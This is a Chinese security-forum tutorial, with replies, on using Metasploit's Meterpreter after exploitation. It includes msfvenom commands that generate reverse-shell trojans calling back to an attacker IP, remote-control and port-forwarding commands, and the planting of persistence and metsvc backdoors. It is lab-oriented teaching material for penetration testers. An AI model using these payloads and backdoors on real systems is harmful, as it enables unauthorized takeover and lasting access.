用户
搜索
  • TA的每日心情
    开心
    2018-10-19 16:14
  • 签到天数: 279 天

    连续签到: 1 天

    [LV.8]以坛为家I

    i春秋作家

    Security Personnel

    Rank: 7Rank: 7Rank: 7

    156

    主题

    1387

    帖子

    2058

    魔法币
    收听
    0
    粉丝
    146
    注册时间
    2015-11-4

    幽默灌水王突出贡献春秋文阁春秋巡逻热心助人奖

    zusheng i春秋作家 Security Personnel 幽默灌水王 突出贡献 春秋文阁 春秋巡逻 热心助人奖 楼主
    发表于 2016-8-25 15:23:01 2635807
    难易程度  ★★★
    阅读点     Meterpreter详细使用方法
    文章作者  zusheng
    文章来源  i春秋原创奖励计划
    时间        2016年8月23日 14:38:43

    前言

    熟悉Metasploit的应该对Meterpreter不陌生,作为后渗透阶段的利器,其强大之处可想而知,那么本篇文章就带大家来学习一下Meterpreter,目的在于让大家了解它的常用命令和使用方法。

    目录

    第一节 初识Meterpreter
    • 1.1、什么是Meterpreter
    • 1.2、Meterpreter的优点

    第二节 Meterpreter中常用的Shell
    • 2.1、reverse_tcp
    • 2.2、reverse_http
    • 2.3、reverse_https
    • 2.4、bind_tcp

    第三节 Meterpreter的常用命令
    • 3.1、基本命令
    • 3.2、文件系统命令
    • 3.3、网络命令
    • 3.4、系统命令

    第四节 后渗透攻击模块
    • 4.1、什么是后渗透攻击模块
    • 4.2、后渗透攻击模块的实现原理
    • 4.3、enum_drives

    第五节 植入后门
    • 5.1、persistence后渗透攻击模块
    • 5.2、metsvc后渗透攻击模块


    • 第一节 初识Meterpreter

    1.1、什么是Meterpreter

    Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpretershell的链接。Meterpretershell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外Meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS[基于主机的入侵检测系统]很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。最后,Meterpreter还可以简化任务创建多个会话。可以来利用这些会话进行渗透。


    1.2、Meterpreter技术优势

    Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台,另外,Meterpreter还提供了基于PHP和Java语言的实现。Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。不需要访问目标主机磁盘,所以也没什么入侵的痕迹。除上述外,Meterpreter还支持Ruby脚本形式的扩展。所以Ruby语言还很有必要。


    • 第二节 Meterpreter中常用的Shell

    2.1、reverse_tcp

    这是一个基于TCP的反弹shell,下面演示Linux下反弹shell,Windows道理一样不做演示。

    • Linux
    使用下列命令生成一个Linux下反弹shell木马:

    [Bash shell] 纯文本查看 复制代码
    msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444  -f elf -o isshell


    i.gif

    看上图,我们可以看见目录下已经成功生成木马文件isshell。然后我们给文件加上执行权限。

    i.gif

    然后我们打开Metasploit,使用模块handler,设置payload,注意:这里设置的payload要和我们生成木马所使用的payload一样。


    i.gif

    设置下地址和端口,我们就开始监听了。
    i.gif

    这边运行一下我们的反弹shell木马,可以发现成功反弹回shell了。

    • Windows:

    [Bash shell] 纯文本查看 复制代码
    msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe -o 要生成的文件名


    2.2、reverse_http
    基于http方式的反向连接,在网速慢的情况下不稳定。
    [Bash shell] 纯文本查看 复制代码
    payload:/windows/meterpreter/reverse_http


    2.3、reverse_https
    基于https方式的反向连接,在网速慢的情况下不稳定。
    [Bash shell] 纯文本查看 复制代码
    payload:/windows/meterpreter/reverse_https


    2.4、bind_tcp
    这是一个基于TCP的正向连接shell,因为在内网跨网段时无法连接到attack的机器,所以在内网中经常会使用,不需要设置LHOST。

    使用下列命令生成木马:
    [Bash shell] 纯文本查看 复制代码
    msfvenom -p linux/x86/meterpreter/bind_tcp lport=4444  -f elf -o bindshell


    同样道理加权限运行,不演示了。


    1.png

    这里注意,我们设置的IP地址和端口就是目标机的。因为这是我们主动来连接它。


    • 第三节 Meterpreter的常用命令

    3.1、基本命令
    [Shell] 纯文本查看 复制代码
    background  # 让meterpreter处于后台模式  
    sessions -i index   # 与会话进行交互,index表示第一个session  
    quit  # 退出会话  
    shell # 获得控制台权限  
    irb # 开启ruby终端


    3.2、文件系统命令

    [Shell] 纯文本查看 复制代码
    cat # 查看文件内容  
    getwd # 查看当前工作目录  
    upload  # 上传文件到目标机上  
    download # 下载文件到本机上  
    edit # 编辑文件  
    search  # 搜索文件
    


    3.3、网络命令

    [Shell] 纯文本查看 复制代码
    ipconfig / ifconfig # 查看网络接口信息  
    portfwd  add -l 4444 -p 3389 -r 192.168.1.102 # 端口转发,本机监听4444,把目标机3389转到本机4444 
    rdesktop -u Administrator -p ichunqiu 127.0.0.1:4444 #然后使用rdesktop来连接,-u 用户名 -p 密码
    route # 获取路由表信息


    3.4、系统命令

    [Shell] 纯文本查看 复制代码
    ps # 查看当前活跃进程 
    migrate pid # 将Meterpreter会话移植到进程数位pid的进程中 
    execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互 
    getpid # 获取当前进程的pid 
    kill pid # 杀死进程 
    getuid # 查看权限 
    sysinfo # 查看目标机系统信息,如机器名,操作系统等 
    shutdown # 关机



    • 第四节 后渗透攻击模块

    4.1、什么是后渗透攻击模块

    后渗透攻击模块(Post)是Metasploit v4版本中正式引入的一种新类型的组件模块,主要支持在渗透攻击取得目标系统远程控制权之后,在受控系统中进行各式各样的后渗透攻击动作,比如获取敏感信息、进一步拓展、实施跳板攻击等。

    4.2、后渗透攻击模块的实现原理
    后渗透攻击模块是通过Ruby语言编写的,目标机上可能没有Ruby解释器吧,那么后渗透攻击模块是如何通过Meterpreter会话在目标机上执行的呢。看下来步骤:
    • 后渗透攻击脚本由Meterpreter客户端解释
    • 远程调用Meterpreter服务端提供的API(Meterpreter服务端即运行在目标机上的攻击载荷)

    4.3、enum_drives

    这个后渗透攻击模块是获取目标主机磁盘分区信息,我们就以这个例讲解后渗透攻击模块使用方法。

    Kali-Linux-2.0.0-vm-amd64-2016-08-25-14-29-17.png

    我们首先将meterpreter会话放入后台,然后搜索我们的模块。

    Kali-Linux-2.0.0-vm-amd64-2016-08-25-14-27-18.png

    然后使用use命令来使用模块,然后设置一下会话id,接着执行,可以发现成功获取到目标主机磁盘分区的信息。


    • 第五节 植入后门

    Meterpreter仅仅是在内存中驻留的Shellcode,只要目标机器重启就会丧失控制权,下面就介绍如何植入后门,维持控制。

    5.1、persistence后渗透攻击模块

    使用方法:
    i9.gif

    -X指定启动的方式为开机自启动,-i反向连接的时间间隔

    然后就是监听,等待后门连接
    i9.gif

    5.2、metsvc后渗透攻击模块

    metsvc后渗透攻击模块其实就是将Meterpreter以系统服务的形式安装到目标主机,它会上传三个文件:
    • metsvc.dll
    • metsvc-service.exe
    • metsvc.exe

    使用方法:

    i9.gif

    到目标机上,我们可以发现Meterpreter服务,正在开启监听并等待连接。

    i9.gif


    结束语
    欢迎大家评论啊,如有不足或错误之处还请指出,感谢大家的支持。好多人加我QQ,加我QQ的请说明来意,不然我不会同意的,不是我多么高冷啊,主要人太多,我也不知道你是来自哪里,大家注明i春秋论坛就行了,谢谢了。

    评分

    参与人数 1魔法币 +100 价值分 +15 收起 理由
    坏蛋 + 100 + 15 价值分奖励

    查看全部评分

    本帖被以下淘专辑推荐:

    Hacking the earth.My Blog:https://isbase.cc
    坏蛋 管理员 欢迎大家来春秋群找我玩 秦 楚 燕 魏 齐 赵 春秋文阁
    来自 13#
    发表于 2016-8-29 10:31:56
    作者
    帖子链接
    评估分数(0-3分)
    原创性
    标题
    排版
    内容要求
    内容深度
    内容趣味性
    点评
    总分
    奖金
    zusheng
    渗透攻防工具篇-后渗透阶段的Meterpreter
    评估分数(0-3分)
    2
    2
    3
    2
    3
    3
    一篇典型的好文章
    15
    150元

    欢迎加入i春秋QQ群大家庭,每人只能任选加入一个群哦!
    投稿请加QQ:780876774。

    i春秋—楚:713729706
    i春秋—魏:687133802
    网安交流群:820783253
    使用道具 举报 回复
    本帖最后由 斯文德流氓 于 2016-10-21 03:45 编辑

    实战中不建议使用Metpreter的persistence,metsvc后门,原因你们懂的 。

    另外看你用enum_drives里设置的会话2应该是system权限了吧,不知道这个模块在普通权限是否能执行?

    随便拿了1个shell(普通权限)测试了下enum_drives这个模块,感觉枚举的不是特别准 -.- 。建议用这条命令:
    [Shell] 纯文本查看 复制代码
    wmic LOGICALDISK get name,Description,filesystem,size,freespace

    1.jpg
    2.jpg

    3.jpg





    评分

    参与人数 1魔法币 +10 收起 理由
    zusheng + 10 欢迎分析讨论交流,i春秋论坛有你更精彩!.

    查看全部评分

    使用道具 举报 回复
    发表于 2016-11-15 20:04:08
    Holle.everybody!I am AuThor!请大家多多关照!
    Holle,everybody! I am AuThor!请大家多多关注,同时也多多关照!(勿喷)
    使用道具 举报 回复
    学习一下~
    使用道具 举报 回复
    发表于 2017-2-27 11:37:36
    神器啊……
    使用道具 举报 回复
    坏蛋 管理员 欢迎大家来春秋群找我玩 秦 楚 燕 魏 齐 赵 春秋文阁
    沙发
    发表于 2016-8-25 15:25:00
    抢占沙发
    欢迎加入i春秋QQ群大家庭,每人只能任选加入一个群哦!
    投稿请加QQ:780876774。

    i春秋—楚:713729706
    i春秋—魏:687133802
    网安交流群:820783253
    使用道具 举报 回复
    使用道具 举报 回复
    发表于 2016-8-25 15:28:33
    很详细,非常不错
    使用道具 举报 回复
    发表于 2016-8-25 16:26:47
    人生苦短,快用python!
    blog:github.so
    使用道具 举报 回复
    发表于 2016-8-25 17:11:26
    mark 一下
    使用道具 举报 回复
    发表于 2016-8-26 09:09:39
    表示写的比较好
    使用道具 举报 回复
    发表于 2016-8-26 11:18:29
    66666666666
    使用道具 举报 回复
    发表于 2016-8-26 12:25:08
    使用道具 举报 回复
    发表于 2016-8-26 15:20:42
    看看是什么先!~
    使用道具 举报 回复
    发表于 2016-8-26 17:16:40
    装逼非常熟练搞起动态图来了
    使用道具 举报 回复
    发表于 2016-8-26 22:05:30
    Mark
    使用道具 举报 回复
    发表于 2016-8-29 10:36:02
    顶一个,狂赞
    使用道具 举报 回复
    发表于 2016-8-29 11:07:34
    还不错  受教
    使用道具 举报 回复
    12下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册